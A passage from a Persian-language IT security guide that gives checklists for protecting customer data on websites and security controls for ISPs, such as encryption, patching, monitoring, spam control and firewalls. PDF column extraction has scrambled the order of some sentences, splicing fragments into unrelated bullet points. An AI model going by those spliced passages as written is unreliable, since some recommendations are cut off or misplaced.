‫ﺗﻤﺎﻡ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ ﺭﻭﻱ ﺷـﺒﻜﻪ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻗﻮﻳﺘﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻣﻮﺟﻮﺩ )ﺩﺭﺻـﻮﺭﺕ ﺍﻣﻜـﺎﻥ ﺑـﺎ‬
‫ﻛﻠﻴﺪ ‪ ۱۲۸‬ﺑﻴﺘﻲ( ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫•‬
‫ﺍﻃﻤﻴﻨــﺎﻥ ﺣﺎﺻــﻞ ﻛﻨﻴــﺪ ﻛــﻪ ﺍﻃﻼﻋــﺎﺕ ﻛــﺎﺭﺕ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﻛﻪ ﻣﻮﻗﺘﹰﺎ ﺩﺭ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﺓ ﻭﺏ ﺫﺧﻴـﺮﻩ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﺗﺮﺍﻛﻨﺶ ﭘـﺎﻙ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫•‬
‫ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﺑﺎﻻ ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﻫﻮﺷـﻴﺎﺭﻱ‬
‫ﺑﻴﺸﺘﺮﻱ ﻧﺴﺒﺖ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ‪ .‬ﺁﻥ ﺭﺍﻳﺎﻧـﻪ‪،‬‬
‫ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺁﻥ‪ ،‬ﻭ ﮔﺰﺍﺭﺷـﻬﺎﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﺩﻗﺖ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﺍﺋﻤﻲ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺸﺘﺮﻱ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ‬
‫ﺩﺭ ﺍﻳﻨﺠﺎ ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﻩ ﺍﻣﺎ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺫﻛﺮ ﺷﺪﻩ ﻛـﻪ ﺁﻧـﺮﺍ ﺑـﻪ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻛﻪ ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﻨـﺪ‬
‫ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﻴﻢ‪ .‬ﺩﺭ ﺻـﻔﺤﺔ ﺍﻭﻝ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺧـﻮﺩ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻳﺘﺎﻥ ﺩﺭ ﻗﺒﺎﻝ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺑﻪ ﺍﻓﺮﺍﺩ ﺗﻮﺿﻴﺢ ﺩﻫﻴﺪ‪ ،‬ﻭ‬
‫ﺍﮔﺮ ﻧﻘﻄﺔ ﺍﺑﻬﺎﻣﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺎﺳﺘﻬﺎﻳﺘﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺟﺎﺯﻩ ﺩﻫﻴـﺪ‬
‫ﺷﺮﻛﺘﺘﺎﻥ ﺗﻮﺳﻂ ﻣﻤﻴﺰﻫﺎﻳﻲ ﺍﺯ ﺧﺎﺭﺝ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗـﺮﺍﺭ‬
‫ﮔﻴﺮﺩ‪.‬‬
‫•‬
‫ﺟﻬــﺖ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ‪ ،‬ﺍﺷــﺨﺎﺹ ﺭﺍ ﻣﻠــﺰﻡ ﺑــﻪ‬
‫ﺛﺒﺖﻧﺎﻡ ﻭ ﻭﺭﻭﺩ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻲ ﻧﻜﻨﻴﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻼﻗﻪ ﻣﻨﺪ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺑﻮﻟﺘﻦ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﺟـﺎﺯﻩ‬
‫ﺩﻫﻴــﺪ ﻛــﻪ ﺑــﺮﺍﻱ ﺛﺒــﺖ ﻧــﺎﻡ ﺗﻨﻬــﺎ ﺍﺯ ﺁﺩﺭﺱ ﭘــﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﻫﺮﮔﺎﻩ ﻧﺎﻣﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺍﺭﺳـﺎﻝ ﻣـﻲﻛﻨﻴـﺪ‪ ،‬ﺑـﻪ ﺁﻧﻬـﺎ‬
‫ﺗﻮﺿﻴﺢ ﺩﻫﻴﺪ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺁﻧﻬـﺎ ﺭﺍ ﭼﮕﻮﻧـﻪ ﺑﺪﺳـﺖ‬
‫ﺁﻭﺭﺩﻩﺍﻳــﺪ ﻭ ﺁﻧﻬــﺎ ﭼﮕﻮﻧــﻪ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺁﺩﺭﺱ ﺧــﻮﺩ ﺭﺍ ﺍﺯ‬
‫ﻓﻬﺮﺳﺖ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻧﺎﻣﻪﻫﺎﻱ ﺷﻤﺎ ﺣﺬﻑ ﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗـﺮﺍﺭ ﻧﺪﻫﻴـﺪ ﻭ‬
‫ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺩﻳﮕﺮ ﻧﻴﺎﺯﻱ ﺑﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﻧﺪﺍﺭﻳـﺪ‪ ،‬ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﭘﺎﻙ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﺑـﺮﺍﻱ ﻣـﺪﺕ ﺯﻳـﺎﺩﻱ ﺍﺯ‬
‫ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﺑﺎﺷـﻨﺪ‪ ،‬ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ‬
‫ﺑﺎﻋﺚ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺷﺨﺎﺹ ﻣﻲﺷـﻮﺩ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺣـﺬﻑ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﻧﺎﻗﻀﺎﻥ ﺳﻴﺎﺳﺖ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﺭﺍ ﺗﺄﺩﻳـﺐ ﻳـﺎ ﺍﺧـﺮﺍﺝ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ‪ISP‬ﻫﺎ‬
‫ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻧﺴﺒﺖ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ‪ISP‬ﻫـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ ﻣﻔﺼﻞﺗـﺮ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺑـﺴﻴﺎﺭ ﺍﻫﻤﻴـﺖ ﺩﺍﺭﺩ ﻛـﻪ ﻫﻤـﺔ‬
‫ﮔﺰﻳﻨﻪﻫﺎ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺗﺼﻤﻴﻢ ﻋﺎﻗﻼﻧـﻪﺍﻱ ﺩﺭﺑـﺎﺭﺓ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﻬﺎ ﺍﺗﺨﺎﺫ ﮔﺮﺩﺩ‪.‬‬
‫•‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﮔﺎﻫﻲ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻳـﺎ ﺳـﺎﻳﺮ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﺎﻟﻲ ﻣﺸﺘﺮﻱ ﺭﺍ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺗﻤﺎﻡ ﻗـﻮﺍﻧﻴﻦ‬
‫ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﻳﺪ ﺍﻋﻤﺎﻝ ﺷﻮﻧﺪ‪.‬‬
‫•‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﻲﺿﺎﺑﻄﻪ ﻳﺎ ﻛﻠﻴﺸﻪﺍﻱ ﻧﻴﺴﺖ‪.‬‬
‫ﻣﻮﺿﻮﻋﺎﺕ ﻣﺨﺘﻠﻒ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﺪ ﻭ ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﻃﺮﺣﻲ‬
‫ﻛﻠﻲ ﺑﺮﻳﺰﻳﺪ‪.‬‬
‫•‬
‫ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ ﺷـﺎﻣﻞ‪ :‬ﻣﻴـﺰﺍﻥ ﺗﻌﻬـﺪ‬
‫ﺷﻤﺎ ﺑﻪ ﻣﺤﺮﻣﺎﻧـﻪ ﻣﺎﻧـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ‬
‫ﻣﺸﺘﺮﻳﺎﻥ )ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺧـﻮﺩ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺩﻳﮕﺮ(؛ ﻭ ﺭﻭﻧﺪﻫﺎﻱ ﮔﺰﺍﺭﺵﺩﻫﻲ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳﻚ ﺣﻤﻠـﺔ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺣﺘﻤـ ﹰﺎ ﺑﺎﻳـﺪ ﺭﻭﻱ‬
‫ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪:‬‬
‫•‬
‫ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﺻﺮﻳﺢ ﻛـﺎﺭﺑﺮ‪ ،‬ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ‬
‫ﺍﻃﻼﻋﺎﺕ ﺷﺨـﺼﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺩﻳﮕﺮ ﻧﮕﺬﺍﺭﻳﺪ‪.‬‬
‫‪٢١٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﻣﻨﻴﺘﻲ )ﮔﺰﺍﺭﺵ ﺑﻪ ﻋﻮﺍﻣﻞ ﺩﺍﺧﻠـﻲ ﺳـﺎﺯﻣﺎﻥ‪ ،‬ﺑـﻪ ‪ISP‬ﻫـﺎ‪ ،‬ﻭ ﻧﻴـﺰ‬
‫•‬
‫ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ(‬
‫•‬
‫ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺧـﻮﺩ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻨﻴـﺪ )ﺁﻳـﺎ ﺗﻨﻬـﺎ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﻆ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺷﻤﺎﺳﺖ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺗﺎ ﭼﻪ ﻣﺪﺕ‬
‫‪ ،ftp ،icq ،finger‬ﻛﺎﻣﭙﺎﻳﻠﺮﻫـﺎ ﻭ ‪ (...‬ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻗﺎﺑـﻞ‬
‫ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫•‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻤﺔ ﺩﺳـﺘﮕﺎﻫﻬﺎ ‪ -‬ﺧـﺼﻮﺻﹰﺎ ﺁﻧﻬـﺎﻳﻲ‬
‫ﻛــﻪ ﻗﺎﺑــﻞ ﺍﺗــﺼﺎﻝ ﺑــﻪ ﺍﻳﻨﺘﺮﻧــﺖ ﻫــﺴﺘﻨﺪ ‪ -‬ﺑــﺎ ﺍﻋﻤــﺎﻝ‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻪ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫•‬
‫ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﻨﺘﺮﻝ ﻣﺪﺍﻭﻡ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗـﺎ ﺑﺘﻮﺍﻧﻴـﺪ‬
‫ﻣــﺸﻜﻼﺗﻲ ﺍﺯ ﻗﺒﻴــﻞ ﺣﻤــﻼﺕ ﺗﺨﺮﻳــﺐ ﺳــﺮﻭﻳﺲ ﻭ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻋﻤﺪﺓ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺭﺍ ﺗـﺸﺨﻴﺺ‬
‫ﺩﻫﻴﺪ‪ .‬ﺍﻳﻦ ﻧﻴﺎﺯﻣﻨﺪ ﺁﻥ ﺍﺳﺖ ﻛـﻪ ﻗـﺎﺩﺭ ﺑﺎﺷـﻴﺪ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﻃﺒﻴﻌﻲ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻗﺎﺑﻠﻴﺖ ﻛﻨﺘﺮﻝ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗﺎ ﺑﻬﺘﺮ ﺑﺘﻮﺍﻧﻴـﺪ‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ )ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ‬
‫ﻭ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ(‪.‬‬
‫•‬
‫ﻭﻳﺮﻭﺱﻳﺎﺏﻫﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﺟﺎﻳﻲ ﻛﻪ ﻭﺭﻭﺩ ﻳﺎ ﺧﺮﻭﺝ ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﺑﺎ ﺗﻬﻴﻪ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﮕﺎﻥ ﻳﺎ ﺍﺭﺯﺍﻥﻗﻴﻤﺖ‪ ،‬ﻣـﺸﺘﺮﻳﺎﻥ‬
‫ﺧﻮﺩ ﺭﺍ ﺗﺮﻏﻴﺐ ﻛﻨﻴﺪ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﺭﺍ ﺍﻳﻤﻦ ﺳﺎﺯﻧﺪ‪.‬‬
‫•‬
‫ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ‬
‫ﻳﻚ ﺗﻮﺯﻳﻊﻛﻨﻨﺪﺓ ﻫﺮﺯﻧﺎﻣﻪ ﺗﺒﺪﻳﻞ ﻧﺸﻮﺩ‪.‬‬
‫•‬
‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﺑﺮﻗﺮﺍﺭﻱ ﻭ ﻗﻄـﻊ‬
‫ﺍﺗﺼﺎﻝ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴـﺪ ﺗـﺎ ﺗﻮﺍﻧـﺎﻳﻲ ﺧـﻮﺩ ﺑـﺮﺍﻱ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻗﺎﻧﻮﻧﻲ ﻋﻠﻴـﻪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺍﻓـﺰﺍﻳﺶ‬
‫ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫•‬
‫ﺍﺯ ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺧـﻮﺩ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺳﺨﺘﮕﻴﺮﺍﻧﻪ ﻭ ﻫﻤﭙﻮﺷﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﻭﺻـــﻠﻪﻫـــﺎﻱ ﺍﻣﻨﻴﺘـــﻲ ﺭﺍ ‪ download‬ﻭ ﺍﺯ ﻃﺮﻳـــﻖ‬
‫ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻭ ﻳﺎ ﺷﺒﻜﺔ ﺗﻮﺯﻳﻊ ﻣﺤﻠﻲ‪ ،‬ﺗﻮﺯﻳﻊ ﻛﻨﻴﺪ‪.‬‬
‫ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﺑﻪﺭﻭﺯ ﺑﻮﺩﻥ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺗﺴﻬﻴﻞ ﻛﺮﺩﻩﺍﻳﺪ‪ ،‬ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﻣـﺼﺮﻓﻲ‬
‫ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﻛﺎﻫﺶ ﺩﺍﺩﻩﺍﻳﺪ‪.‬‬
‫ﺑﺎﻳﺪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ‪ ،‬ﻭ ‪.(...‬‬
‫•‬
‫ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ ﺩﺭ ﺧﺼﻮﺹ ﭼﮕﻮﻧﮕﻲ ﻭﺍﻛـﻨﺶ‬
‫ﺑﻪ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ‪ISP ،‬ﻫـﺎﻱ‬
‫ﻫﻤﺘﺎ‪ ،‬ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪﮔﺎﻥ ﻋﻤﺪﺓ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ‪ ،‬ﻭ ﺳﺎﻳﺮ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﺍﻳﻨﺘﺮﻧﺖ‪.‬‬
‫•‬
‫ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﺘﺮﻳﺎﻥ ﺧﺪﻣﺎﺕ ﺷـﻤﺎ ﺑـﻪ‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﻴﺮﻭﻧــﻲ ﺣﻤﻠــﻪ ﻛﻨﻨــﺪ‪ .‬ﻣــﻲﺗﻮﺍﻧﻴــﺪ ﺑــﺮﺍﻱ‬
‫ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﮔﺰﺍﺭﺷﺎﺕ ﺳﺎﻳﺮ ‪ISP‬ﻫﺎ ﻣﺒﻨﻲ ﺑـﺮ ﺩﺳـﺖ‬
‫ﺩﺍﺷﺘﻦ ﻣﺸﺘﺮﻳﺎﻥ ﺷﻤﺎ ﺩﺭ ﺣﻤﻼﺕ‪ ،‬ﻳﻚ ﺳﻴﺎﺳﺖ ﺗـﺪﻭﻳﻦ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫•‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺭ ﺳﻄﺢ ‪ ISP‬ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻭﻳﺮﻭﺱﻳﺎﺏ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳـﺖ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﺑـﺮﺍﻱ‬
‫ﻓﺮﺳﺘﻨﺪﺓ ﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﻫـﺸﺪﺍﺭﻫﺎﻳﻲ ﻣﺒﻨـﻲ ﺑـﺮ "ﻋـﺪﻡ‬
‫ﺍﻧﺘﻘﺎﻝ ﻧﺎﻣﻪ ﺑﺪﻟﻴﻞ ﺁﻟﻮﺩﮔﻲ ﺑﻪ ﻭﻳﺮﻭﺱ" ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﺎﺭﺑﺮﺩ ﻣﺠﺎﺯ )‪ ٢٠٦(AUP‬ﺗﺪﻭﻳﻦ ﻛﻨﻴـﺪ ﻛـﻪ‬
‫ﺷﺎﻣﻞ ﻭﻇـﺎﻳﻒ ﻣﺘﻘﺎﺑـﻞ ‪ ISP‬ﻭ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺎﺷـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤﺎﻡ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻣﺸﺘﺮﻱ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫•‬
‫ﺷﺒﻜﻪ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ ﻃﺮﺍﺣـﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﺗـﺎ ﺣـﺪ ﺍﻣﻜـﺎﻥ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻋﻤﻠﻲ ﺑﺎﺷﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺷﺒﻜﺔ ﺷـﻤﺎ ﺭﺍ‬
‫ﻛﻨﺘﺮﻝ ﻭ ﺍﺩﺍﺭﻩ ﻣﻲﻛﻨﻨﺪ )ﺍﺯ ﺟﻤﻠﻪ ﺳﻴـﺴﺘﻢ ﻣﻴﺰﺑـﺎﻥ ﺣـﺴﺎﺑﻬﺎﻱ‬
‫ﻛـﺎﺭﺑﺮﻱ( ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺠﺰﺍ ﺷـﺪﻩ‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫•‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﭘﻴﺪﺍ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺑﺨـﺶ‬
‫ﻣﺪﻳﺮﻳﺖ‪ ،‬ﺑﺨﺶ ﺧﺪﻣﺎﺕ )ﻣﺜـﻞ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻭﺏ‪ ،‬ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ‪ Proxy ،‬ﻭ ‪ (DNS‬ﻭ ﺗﻤــﺎﻡ‬
‫ﺗﺠﻬﻴﺰﺍﺕ ﻣﺴﻴﺮﻳﺎﺑﻲ ﻭ ﻛﻨﺘﺮﻟﻲ ﺷﺒﻜﻪ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ‬
‫ﻣــﺴﺘﺤﻜﻢ ﻭ ﻗــﻮﺍﻧﻴﻦ ﺩﺳﺘﺮﺳــﻲ ﻣﺤﺪﻭﺩﺷــﺪﻩ ﺍﺳــﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻴﺪ‪.‬‬
‫‪206 Acceptable Use Policy‬‬
